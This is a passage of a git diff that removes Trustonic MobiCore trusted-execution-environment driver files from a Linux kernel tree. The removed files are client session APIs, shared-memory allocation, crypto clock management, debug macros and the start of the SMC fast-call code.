--	/* Number of references kept to this object */
--	struct kref		kref;
--	/* List of contiguous buffers allocated by mcMallocWsm for the client */
--	struct list_head	cbufs;
--	struct mutex		cbufs_lock;	/* lock for the cbufs list */
--	/* List of tbase TA sessions opened by this client */
--	struct list_head	sessions;
--	struct mutex		sessions_lock;	/* sessions list + closing */
--	/* Client state */
--	bool			closing;
--	/* The list entry to attach to "ctx.clients" list */
--	struct list_head	list;
--};
--
--struct tbase_client *client_create(bool is_from_kernel);
--
--void client_close_sessions(struct tbase_client *client);
--
--static inline void client_get(struct tbase_client *client)
--{
--	kref_get(&client->kref);
--}
--
--void client_put(struct tbase_client *client);
--
--bool client_is_kernel(struct tbase_client *client);
--
--bool client_set_closing(struct tbase_client *client);
--
--int client_add_session(struct tbase_client *client,
--		       const struct tbase_object *obj, uintptr_t tci,
--		       size_t len, uint32_t *p_sid, bool is_gp_uuid,
--		       struct mc_identity *identity);
--
--int client_remove_session(struct tbase_client *client, uint32_t session_id);
--
--struct tbase_session *client_ref_session(struct tbase_client *client,
--					 uint32_t session_id);
--
--void client_unref_session(struct tbase_session *session);
--
--int client_info(struct tbase_client *client, struct kasnprintf_buf *buf);
--
--/*
-- * Contiguous buffer allocated to TLCs.
-- * These buffers are uses as world shared memory (wsm) and shared with
-- * secure world.
-- * The virtual kernel address is added for a simpler search algorithm.
-- */
--struct tbase_cbuf;
--
--int tbase_cbuf_alloc(struct tbase_client *client, uint32_t len,
--		     uintptr_t *addr, struct vm_area_struct *vmarea);
--
--int tbase_cbuf_free(struct tbase_client *client, uintptr_t addr);
--
--struct tbase_cbuf *tbase_cbuf_get_by_addr(struct tbase_client *client,
--					  uintptr_t addr);
--
--void tbase_cbuf_get(struct tbase_cbuf *cbuf);
--
--void tbase_cbuf_put(struct tbase_cbuf *cbuf);
--
--uintptr_t tbase_cbuf_addr(struct tbase_cbuf *cbuf);
--
--uintptr_t tbase_cbuf_uaddr(struct tbase_cbuf *cbuf);
--
--uint32_t tbase_cbuf_len(struct tbase_cbuf *cbuf);
--
--#endif /* _CLIENT_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/clientlib.c b/drivers/gud/MobiCoreDriver/clientlib.c
-deleted file mode 100644
-index c7d6d023b3a80..0000000000000
---- a/drivers/gud/MobiCoreDriver/clientlib.c
-+++ /dev/null
-@@ -1,433 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include <linux/module.h>
--#include <linux/init.h>
--#include <linux/kernel.h>
--#include <linux/device.h>
--#include <linux/sched.h>
--#include <linux/list.h>
--
--#include "public/mc_linux.h"
--#include "public/mc_admin.h"
--#include "public/mobicore_driver_api.h"
--
--#include "main.h"
--#include "debug.h"
--#include "client.h"
--#include "session.h"
--#include "api.h"
--
--enum mc_result convert(int err)
--{
--	switch (-err) {
--	case 0:
--		return MC_DRV_OK;
--	case ENOMSG:
--		return MC_DRV_NO_NOTIFICATION;
--	case EBADMSG:
--		return MC_DRV_ERR_NOTIFICATION;
--	case EAGAIN:
--		return MC_DRV_ERR_OUT_OF_RESOURCES;
--	case EHOSTDOWN:
--		return MC_DRV_ERR_INIT;
--	case ENODEV:
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--	case ENXIO:
--		return MC_DRV_ERR_UNKNOWN_SESSION;
--	case EPERM:
--		return MC_DRV_ERR_INVALID_OPERATION;
--	case EBADE:
--		return MC_DRV_ERR_INVALID_RESPONSE;
--	case ETIME:
--		return MC_DRV_ERR_TIMEOUT;
--	case ENOMEM:
--		return MC_DRV_ERR_NO_FREE_MEMORY;
--	case EUCLEAN:
--		return MC_DRV_ERR_FREE_MEMORY_FAILED;
--	case ENOTEMPTY:
--		return MC_DRV_ERR_SESSION_PENDING;
--	case EHOSTUNREACH:
--		return MC_DRV_ERR_DAEMON_UNREACHABLE;
--	case ENOENT:
--		return MC_DRV_ERR_INVALID_DEVICE_FILE;
--	case EINVAL:
--		return MC_DRV_ERR_INVALID_PARAMETER;
--	case EPROTO:
--		return MC_DRV_ERR_KERNEL_MODULE;
--	case EADDRINUSE:
--		return MC_DRV_ERR_BULK_MAPPING;
--	case EADDRNOTAVAIL:
--		return MC_DRV_ERR_BULK_UNMAPPING;
--	case ECOMM:
--		return MC_DRV_INFO_NOTIFICATION;
--	case EUNATCH:
--		return MC_DRV_ERR_NQ_FAILED;
--	default:
--		MCDRV_DBG("error is %d", err);
--		return MC_DRV_ERR_UNKNOWN;
--	}
--}
--
--static inline bool is_valid_device(uint32_t device_id)
--{
--	return MC_DEVICE_ID_DEFAULT == device_id;
--}
--
--static struct tbase_client *client;
--static int open_count;
--static DEFINE_MUTEX(dev_mutex);	/* Lock for the device */
--
--static bool clientlib_client_get(void)
--{
--	int ret = true;
--
--	mutex_lock(&dev_mutex);
--	if (!client)
--		ret = false;
--	else
--		client_get(client);
--
--	mutex_unlock(&dev_mutex);
--	return ret;
--}
--
--static void clientlib_client_put(void)
--{
--	mutex_lock(&dev_mutex);
--	client_put(client);
--	mutex_unlock(&dev_mutex);
--}
--
--enum mc_result mc_open_device(uint32_t device_id)
--{
--	enum mc_result mc_result = MC_DRV_OK;
--
--	/* Check parameters */
--	if (!is_valid_device(device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	mutex_lock(&dev_mutex);
--	if (!open_count)
--		client = api_open_device(true);
--
--	if (client) {
--		open_count++;
--		MCDRV_DBG("Successfully opened the device.");
--	} else {
--		mc_result = MC_DRV_ERR_INVALID_DEVICE_FILE;
--		MCDRV_DBG("Could not open device");
--	}
--
--	mutex_unlock(&dev_mutex);
--	return mc_result;
--}
--EXPORT_SYMBOL(mc_open_device);
--
--enum mc_result mc_close_device(uint32_t device_id)
--{
--	enum mc_result mc_result = MC_DRV_OK;
--
--	/* Check parameters */
--	if (!is_valid_device(device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	mutex_lock(&dev_mutex);
--	if (!client) {
--		mc_result = MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--		goto end;
--	}
--
--	if (open_count > 1) {
--		open_count--;
--		goto end;
--	}
--
--	/* Check sessions and freeze client */
--	mc_result = convert(api_freeze_device(client));
--	if (MC_DRV_OK != mc_result)
--		goto end;
--
--	/* Close the device */
--	api_close_device(client);
--	client = NULL;
--	open_count = 0;
--
--end:
--	mutex_unlock(&dev_mutex);
--	return mc_result;
--}
--EXPORT_SYMBOL(mc_close_device);
--
--enum mc_result mc_open_session(struct mc_session_handle *session,
--			       const struct mc_uuid_t *uuid,
--			       uint8_t *tci, uint32_t len)
--{
--	struct mc_identity identity = {
--		.login_type = TEEC_LOGIN_PUBLIC,
--	};
--	enum mc_result ret;
--
--	/* Check parameters */
--	if (!session)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!is_valid_device(session->device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	if (!clientlib_client_get())
--		return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
--	/* Call core api */
--	ret = convert(api_open_session(client, &session->session_id, uuid,
--				       (uintptr_t)tci, len, false, &identity));
--	clientlib_client_put();
--	return ret;
--}
--EXPORT_SYMBOL(mc_open_session);
--
--enum mc_result mc_open_trustlet(struct mc_session_handle *session,
--				uint32_t spid,
--				uint8_t *trustlet, uint32_t trustlet_len,
--				uint8_t *tci, uint32_t len)
--{
--	enum mc_result ret;
--
--	/* Check parameters */
--	if (!session)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!is_valid_device(session->device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	if (!clientlib_client_get())
--		return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
--	/* Call core api */
--	ret = convert(api_open_trustlet(client, &session->session_id, spid,
--					(uintptr_t)trustlet, trustlet_len,
--					(uintptr_t)tci, len));
--	clientlib_client_put();
--	return ret;
--}
--EXPORT_SYMBOL(mc_open_trustlet);
--
--enum mc_result mc_close_session(struct mc_session_handle *session)
--{
--	enum mc_result ret;
--
--	/* Check parameters */
--	if (!session)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!is_valid_device(session->device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	if (!clientlib_client_get())
--		return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
--	/* Call core api */
--	ret = convert(api_close_session(client, session->session_id));
--	clientlib_client_put();
--	return ret;
--}
--EXPORT_SYMBOL(mc_close_session);
--
--enum mc_result mc_notify(struct mc_session_handle *session)
--{
--	enum mc_result ret;
--
--	/* Check parameters */
--	if (!session)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!is_valid_device(session->device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	if (!clientlib_client_get())
--		return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
--	/* Call core api */
--	ret = convert(api_notify(client, session->session_id));
--	clientlib_client_put();
--	return ret;
--}
--EXPORT_SYMBOL(mc_notify);
--
--enum mc_result mc_wait_notification(struct mc_session_handle *session,
--				    int32_t timeout)
--{
--	enum mc_result ret;
--
--	/* Check parameters */
--	if (!session)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!is_valid_device(session->device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	if (!clientlib_client_get())
--		return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
--	/* Call core api */
--	ret = convert(api_wait_notification(client, session->session_id,
--					    timeout));
--	clientlib_client_put();
--	return ret;
--}
--EXPORT_SYMBOL(mc_wait_notification);
--
--enum mc_result mc_malloc_wsm(uint32_t device_id, uint32_t align, uint32_t len,
--			     uint8_t **wsm, uint32_t wsm_flags)
--{
--	enum mc_result ret;
--	uintptr_t va;
--
--	/* Check parameters */
--	if (!is_valid_device(device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	if (!len)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!wsm)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!clientlib_client_get())
--		return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
--	/* Call core api */
--	ret = convert(api_malloc_cbuf(client, len, &va, NULL));
--	if (ret == MC_DRV_OK)
--		*wsm = (uint8_t *)va;
--
--	clientlib_client_put();
--	return ret;
--}
--EXPORT_SYMBOL(mc_malloc_wsm);
--
--enum mc_result mc_free_wsm(uint32_t device_id, uint8_t *wsm)
--{
--	enum mc_result ret;
--	uintptr_t va = (uintptr_t)wsm;
--
--	/* Check parameters */
--	if (!is_valid_device(device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	if (!clientlib_client_get())
--		return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
--	/* Call core api */
--	ret = convert(api_free_cbuf(client, va));
--	clientlib_client_put();
--	return ret;
--}
--EXPORT_SYMBOL(mc_free_wsm);
--
--enum mc_result mc_map(struct mc_session_handle *session, void *address,
--		      uint32_t length, struct mc_bulk_map *map_info)
--{
--	enum mc_result ret;
--	struct mc_ioctl_buffer bufs[MC_MAP_MAX];
--	uint32_t i;
--
--	/* Check parameters */
--	if (!session)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!is_valid_device(session->device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	if (!map_info)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!clientlib_client_get())
--		return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
--	/* Call core api */
--	bufs[0].va = (uintptr_t)address;
--	bufs[0].len = length;
--	for (i = 1; i < MC_MAP_MAX; i++)
--		bufs[i].va = 0;
--
--	ret = convert(api_map_wsms(client, session->session_id, bufs));
--	if (ret == MC_DRV_OK) {
--		map_info->secure_virt_addr = bufs[0].sva;
--		map_info->secure_virt_len = bufs[0].len;
--	}
--
--	clientlib_client_put();
--	return ret;
--}
--EXPORT_SYMBOL(mc_map);
--
--enum mc_result mc_unmap(struct mc_session_handle *session, void *address,
--			struct mc_bulk_map *map_info)
--{
--	enum mc_result ret;
--	struct mc_ioctl_buffer bufs[MC_MAP_MAX];
--	uint32_t i;
--
--	/* Check parameters */
--	if (!session)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!is_valid_device(session->device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	if (!map_info)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!clientlib_client_get())
--		return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
--	/* Call core api */
--	bufs[0].va = (uintptr_t)address;
--	bufs[0].len = map_info->secure_virt_len;
--	bufs[0].sva = map_info->secure_virt_addr;
--	for (i = 1; i < MC_MAP_MAX; i++)
--		bufs[i].va = 0;
--
--	ret = convert(api_unmap_wsms(client, session->session_id, bufs));
--	clientlib_client_put();
--	return ret;
--}
--EXPORT_SYMBOL(mc_unmap);
--
--enum mc_result mc_get_session_error_code(struct mc_session_handle *session,
--					 int32_t *exit_code)
--{
--	enum mc_result ret;
--
--	/* Check parameters */
--	if (!session)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!is_valid_device(session->device_id))
--		return MC_DRV_ERR_UNKNOWN_DEVICE;
--
--	if (!exit_code)
--		return MC_DRV_ERR_INVALID_PARAMETER;
--
--	if (!clientlib_client_get())
--		return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
--	/* Call core api */
--	ret = convert(api_get_session_exitcode(client, session->session_id,
--					       exit_code));
--	clientlib_client_put();
--	return ret;
--}
--EXPORT_SYMBOL(mc_get_session_error_code);
-diff --git a/drivers/gud/MobiCoreDriver/clock.c b/drivers/gud/MobiCoreDriver/clock.c
-deleted file mode 100644
-index 0195ab794f205..0000000000000
---- a/drivers/gud/MobiCoreDriver/clock.c
-+++ /dev/null
-@@ -1,161 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include "platform.h"
--
--#ifdef MC_CRYPTO_CLOCK_MANAGEMENT
--
--#include <linux/device.h>
--#include <linux/clk.h>
--#include <linux/err.h>
--#include <linux/of.h>
--
--#include "debug.h"
--#include "clock.h"
--
--static struct clk_context {
--	struct clk		*mc_ce_iface_clk;
--	struct clk		*mc_ce_core_clk;
--	struct clk		*mc_ce_bus_clk;
--	struct clk		*mc_ce_core_src_clk;
--} clk_ctx;
--
--int mc_clock_init(void)
--{
--	int ret = 0;
--#ifdef MC_CLOCK_CORESRC_DEFAULTRATE
--	int core_src_rate = MC_CLOCK_CORESRC_DEFAULTRATE;
--
--	/* Get core clk src */
--	clk_ctx.mc_ce_core_src_clk = clk_get(g_ctx.mcd, "core_clk_src");
--	if (IS_ERR(clk_ctx.mc_ce_core_src_clk)) {
--		ret = PTR_ERR(clk_ctx.mc_ce_core_src_clk);
--		MCDRV_ERROR("cannot get core src clock: %d", ret);
--		goto error;
--	}
--
--#ifdef MC_CRYPTO_CLOCK_CORESRC_PROPNAME
--	if (of_property_read_u32(g_ctx.mcd->of_node,
--				 MC_CRYPTO_CLOCK_CORESRC_PROPNAME,
--				 &core_src_rate)) {
--		core_src_rate = MC_CLOCK_CORESRC_DEFAULTRATE;
--		MCDRV_ERROR("cannot get ce clock frequency from DT, use %d",
--			    core_src_rate);
--	}
--#endif /* MC_CRYPTO_CLOCK_CORESRC_PROPNAME */
--
--	ret = clk_set_rate(clk_ctx.mc_ce_core_src_clk, core_src_rate);
--	if (ret) {
--		clk_put(clk_ctx.mc_ce_core_src_clk);
--		clk_ctx.mc_ce_core_src_clk = NULL;
--		MCDRV_ERROR("cannot set core clock src rate: %d", ret);
--		ret = -EIO;
--		goto error;
--	}
--#endif  /* MC_CLOCK_CORESRC_DEFAULTRATE */
--
--	/* Get core clk */
--	clk_ctx.mc_ce_core_clk = clk_get(g_ctx.mcd, "core_clk");
--	if (IS_ERR(clk_ctx.mc_ce_core_clk)) {
--		ret = PTR_ERR(clk_ctx.mc_ce_core_clk);
--		MCDRV_ERROR("cannot get core clock: %d", ret);
--		goto error;
--	}
--	/* Get Interface clk */
--	clk_ctx.mc_ce_iface_clk = clk_get(g_ctx.mcd, "iface_clk");
--	if (IS_ERR(clk_ctx.mc_ce_iface_clk)) {
--		clk_put(clk_ctx.mc_ce_core_clk);
--		ret = PTR_ERR(clk_ctx.mc_ce_iface_clk);
--		MCDRV_ERROR("cannot get iface clock: %d", ret);
--		goto error;
--	}
--	/* Get AXI clk */
--	clk_ctx.mc_ce_bus_clk = clk_get(g_ctx.mcd, "bus_clk");
--	if (IS_ERR(clk_ctx.mc_ce_bus_clk)) {
--		clk_put(clk_ctx.mc_ce_iface_clk);
--		clk_put(clk_ctx.mc_ce_core_clk);
--		ret = PTR_ERR(clk_ctx.mc_ce_bus_clk);
--		MCDRV_ERROR("cannot get AXI bus clock: %d", ret);
--		goto error;
--	}
--	return ret;
--
--error:
--	clk_ctx.mc_ce_core_clk = NULL;
--	clk_ctx.mc_ce_iface_clk = NULL;
--	clk_ctx.mc_ce_bus_clk = NULL;
--	clk_ctx.mc_ce_core_src_clk = NULL;
--	return ret;
--}
--
--void mc_clock_exit(void)
--{
--	if (clk_ctx.mc_ce_iface_clk)
--		clk_put(clk_ctx.mc_ce_iface_clk);
--
--	if (clk_ctx.mc_ce_core_clk)
--		clk_put(clk_ctx.mc_ce_core_clk);
--
--	if (clk_ctx.mc_ce_bus_clk)
--		clk_put(clk_ctx.mc_ce_bus_clk);
--
--	if (clk_ctx.mc_ce_core_src_clk)
--		clk_put(clk_ctx.mc_ce_core_src_clk);
--}
--
--int mc_clock_enable(void)
--{
--	int rc;
--
--	rc = clk_prepare_enable(clk_ctx.mc_ce_core_clk);
--	if (rc) {
--		MCDRV_ERROR("cannot enable core clock");
--		goto err_core;
--	}
--
--	rc = clk_prepare_enable(clk_ctx.mc_ce_iface_clk);
--	if (rc) {
--		MCDRV_ERROR("cannot enable interface clock");
--		goto err_iface;
--	}
--
--	rc = clk_prepare_enable(clk_ctx.mc_ce_bus_clk);
--	if (rc) {
--		MCDRV_ERROR("cannot enable bus clock");
--		goto err_bus;
--	}
--
--	return 0;
--
--err_bus:
--	clk_disable_unprepare(clk_ctx.mc_ce_iface_clk);
--err_iface:
--	clk_disable_unprepare(clk_ctx.mc_ce_core_clk);
--err_core:
--	return rc;
--}
--
--void mc_clock_disable(void)
--{
--	if (clk_ctx.mc_ce_iface_clk)
--		clk_disable_unprepare(clk_ctx.mc_ce_iface_clk);
--
--	if (clk_ctx.mc_ce_core_clk)
--		clk_disable_unprepare(clk_ctx.mc_ce_core_clk);
--
--	if (clk_ctx.mc_ce_bus_clk)
--		clk_disable_unprepare(clk_ctx.mc_ce_bus_clk);
--}
--
--#endif /* MC_CRYPTO_CLOCK_MANAGEMENT */
-diff --git a/drivers/gud/MobiCoreDriver/clock.h b/drivers/gud/MobiCoreDriver/clock.h
-deleted file mode 100644
-index 21095499efb53..0000000000000
---- a/drivers/gud/MobiCoreDriver/clock.h
-+++ /dev/null
-@@ -1,53 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MC_CLOCK_H_
--#define _MC_CLOCK_H_
--
--#include "platform.h"	/* MC_CRYPTO_CLOCK_MANAGEMENT */
--
--#ifdef MC_CRYPTO_CLOCK_MANAGEMENT
--
--/* Initialize secure crypto clocks */
--int mc_clock_init(void);
--/* Free secure crypto clocks */
--void mc_clock_exit(void);
--/* Enable secure crypto clocks */
--int mc_clock_enable(void);
--/* Disable secure crypto clocks */
--void mc_clock_disable(void);
--
--#else /* MC_CRYPTO_CLOCK_MANAGEMENT */
--
--static inline int mc_clock_init(void)
--{
--	return 0;
--}
--
--static inline void mc_clock_exit(void)
--{
--}
--
--static inline int mc_clock_enable(void)
--{
--	return 0;
--}
--
--static inline void mc_clock_disable(void)
--{
--}
--
--#endif /* !MC_CRYPTO_CLOCK_MANAGEMENT */
--
--#endif /* _MC_CLOCK_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/debug.h b/drivers/gud/MobiCoreDriver/debug.h
-deleted file mode 100644
-index 9d6a52ab955b6..0000000000000
---- a/drivers/gud/MobiCoreDriver/debug.h
-+++ /dev/null
-@@ -1,63 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MC_DEBUG_H_
--#define _MC_DEBUG_H_
--
--#include "main.h"	/* g_ctx */
--
--#define MCDRV_ERROR(txt, ...) \
--	dev_err(g_ctx.mcd, "%s() ### ERROR: " txt "\n", \
--		__func__, \
--		##__VA_ARGS__)
--
--/* dummy function helper macro. */
--#define DUMMY_FUNCTION()	do {} while (0)
--
--#ifdef DEBUG
--
--#ifdef DEBUG_VERBOSE
--#define MCDRV_DBG_VERBOSE	MCDRV_DBG
--#else
--#define MCDRV_DBG_VERBOSE(...)	DUMMY_FUNCTION()
--#endif
--
--#define MCDRV_DBG(txt, ...) \
--	dev_info(g_ctx.mcd, "%s(): " txt "\n", \
--		 __func__, \
--		 ##__VA_ARGS__)
--
--#define MCDRV_DBG_WARN(txt, ...) \
--	dev_warn(g_ctx.mcd, "%s() WARNING: " txt "\n", \
--		 __func__, \
--		 ##__VA_ARGS__)
--
--#define MCDRV_ASSERT(cond) \
--	do { \
--		if (unlikely(!(cond))) { \
--			panic("Assertion failed: %s:%d\n", \
--			      __FILE__, __LINE__); \
--		} \
--	} while (0)
--
--#else /* DEBUG */
--
--#define MCDRV_DBG_VERBOSE(...)	DUMMY_FUNCTION()
--#define MCDRV_DBG(...)		DUMMY_FUNCTION()
--#define MCDRV_DBG_WARN(...)	DUMMY_FUNCTION()
--
--#define MCDRV_ASSERT(...)	DUMMY_FUNCTION()
--
--#endif /* !DEBUG */
--
--#endif /* _MC_DEBUG_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/fastcall.c b/drivers/gud/MobiCoreDriver/fastcall.c
-deleted file mode 100644
-index ee612632331c8..0000000000000
---- a/drivers/gud/MobiCoreDriver/fastcall.c
-+++ /dev/null
-@@ -1,512 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#include <linux/kthread.h>
--#include <linux/module.h>
--#include <linux/device.h>
--#include <linux/workqueue.h>
--#include <linux/cpu.h>
--#include <linux/moduleparam.h>
--
--#include "public/mc_linux.h"
--#include "public/mc_linux_api.h"
--
--#include "mci/mcifc.h"
--
--#include "platform.h"	/* MC_FASTCALL_WORKER_THREAD and more */
--#include "debug.h"
--#include "clock.h"	/* mc_clock_enable, mc_clock_disable */
--#include "fastcall.h"
--
--struct fastcall_work {
--#ifdef MC_FASTCALL_WORKER_THREAD
--	struct kthread_work work;
--#else
--	struct work_struct work;
--#endif
--	void *data;
--};
--
--/* generic fast call parameters */
--union mc_fc_generic {
--	struct {
--		uint32_t cmd;
--		uint32_t param[3];
--	} as_in;
--	struct {
--		uint32_t resp;
--		uint32_t ret;
--		uint32_t param[2];
--	} as_out;
--};
--
--/* fast call init */
--union mc_fc_init {
--	union mc_fc_generic as_generic;
--	struct {
--		uint32_t cmd;
--		uint32_t base;
--		uint32_t nq_info;
--		uint32_t mcp_info;
--	} as_in;
--	struct {
--		uint32_t resp;
--		uint32_t ret;
--		uint32_t rfu[2];
--	} as_out;
--};
--
--/* fast call info parameters */
--union mc_fc_info {
--	union mc_fc_generic as_generic;
--	struct {
--		uint32_t cmd;
--		uint32_t ext_info_id;
--		uint32_t rfu[2];
--	} as_in;
--	struct {
--		uint32_t resp;
--		uint32_t ret;
--		uint32_t state;
--		uint32_t ext_info;
--	} as_out;
--};
--
--#ifdef TBASE_CORE_SWITCHER
--/* fast call switch Core parameters */
--union mc_fc_swich_core {
--	union mc_fc_generic as_generic;
--	struct {
--		uint32_t cmd;
--		uint32_t core_id;
--		uint32_t rfu[2];
--	} as_in;
--	struct {
--		uint32_t resp;
--		uint32_t ret;
--		uint32_t state;
--		uint32_t ext_info;
--	} as_out;
--};
--#endif
--
--#ifdef MC_FASTCALL_WORKER_THREAD
--static struct task_struct *fastcall_thread;
--static DEFINE_KTHREAD_WORKER(fastcall_worker);
--#endif
--
--/*
-- * _smc() - fast call to MobiCore
-- *
-- * @data: pointer to fast call data
-- */
--static inline int _smc(union mc_fc_generic *mc_fc_generic)
--{
--	if (!mc_fc_generic)
--		return -EINVAL;
--
--#ifdef MC_SMC_FASTCALL
--	return smc_fastcall(mc_fc_generic, sizeof(*mc_fc_generic));
--#else /* MC_SMC_FASTCALL */
--	{
--#ifdef CONFIG_ARM64
--		/* SMC expect values in x0-x3 */
--		register u64 reg0 __asm__("x0") = mc_fc_generic->as_in.cmd;
--		register u64 reg1 __asm__("x1") = mc_fc_generic->as_in.param[0];
--		register u64 reg2 __asm__("x2") = mc_fc_generic->as_in.param[1];
--		register u64 reg3 __asm__("x3") = mc_fc_generic->as_in.param[2];
--
--		/*
--		 * According to AARCH64 SMC Calling Convention (ARM DEN 0028A),
--		 * section 3.1: registers x4-x17 are unpredictable/scratch
--		 * registers.  So we have to make sure that the compiler does
--		 * not allocate any of those registers by letting him know that
--		 * the asm code might clobber them.
--		 */
--		__asm__ volatile (
--			"smc #0\n"
--			: "+r"(reg0), "+r"(reg1), "+r"(reg2), "+r"(reg3)
--			:
--			: "x4", "x5", "x6", "x7", "x8", "x9", "x10", "x11",
--			  "x12", "x13", "x14", "x15", "x16", "x17"
--		);
--#else /* CONFIG_ARM64 */
--		/* SMC expect values in r0-r3 */
--		register u32 reg0 __asm__("r0") = mc_fc_generic->as_in.cmd;
--		register u32 reg1 __asm__("r1") = mc_fc_generic->as_in.param[0];
--		register u32 reg2 __asm__("r2") = mc_fc_generic->as_in.param[1];
--		register u32 reg3 __asm__("r3") = mc_fc_generic->as_in.param[2];
--
--		__asm__ volatile (
--#ifdef MC_ARCH_EXTENSION_SEC
--			/* This pseudo op is supported and required from
--			 * binutils 2.21 on */
--			".arch_extension sec\n"
--#endif /* MC_ARCH_EXTENSION_SEC */
--			"smc #0\n"
--			: "+r"(reg0), "+r"(reg1), "+r"(reg2), "+r"(reg3)
--		);
--
--#ifdef __ARM_VE_A9X4_QEMU__
--		/* Qemu does not return to the address following the SMC
--		 * instruction so we have to insert several nop instructions to
--		 * workaround this Qemu bug. */
--		__asm__ volatile (
--			"nop\n"
--			"nop\n"
--			"nop\n"
--			"nop"
--		);
--#endif /* __ARM_VE_A9X4_QEMU__ */
--#endif /* !CONFIG_ARM64 */
--
--		/* set response */
--		mc_fc_generic->as_out.resp     = reg0;
--		mc_fc_generic->as_out.ret      = reg1;
--		mc_fc_generic->as_out.param[0] = reg2;
--		mc_fc_generic->as_out.param[1] = reg3;
--	}
--	return 0;
--#endif /* !MC_SMC_FASTCALL */
--}
--
--#ifdef TBASE_CORE_SWITCHER
--static uint32_t active_cpu;
--
--#ifdef MC_FASTCALL_WORKER_THREAD
--static void mc_cpu_offline(int cpu)
--{
--	int i;
--
--	if (active_cpu != cpu) {
--		MCDRV_DBG("not active CPU, no action taken\n");
--		return;
--	}
--
--	/* Chose the first online CPU and switch! */
--	for_each_online_cpu(i) {
--		if (cpu != i) {
--			MCDRV_DBG("CPU %d is dying, switching to %d\n", cpu, i);
--			mc_switch_core(i);
--			break;
--		}
--
--		MCDRV_DBG("Skipping CPU %d\n", cpu);
--	}
--}
--
--static int mobicore_cpu_callback(struct notifier_block *nfb,
--				 unsigned long action, void *hcpu)
--{
--	unsigned int cpu = (unsigned long)hcpu;
--
--	switch (action) {
--	case CPU_DOWN_PREPARE:
--	case CPU_DOWN_PREPARE_FROZEN:
--		dev_info(g_ctx.mcd, "Cpu %u is going to die\n", cpu);
--		mc_cpu_offline(cpu);
--		break;
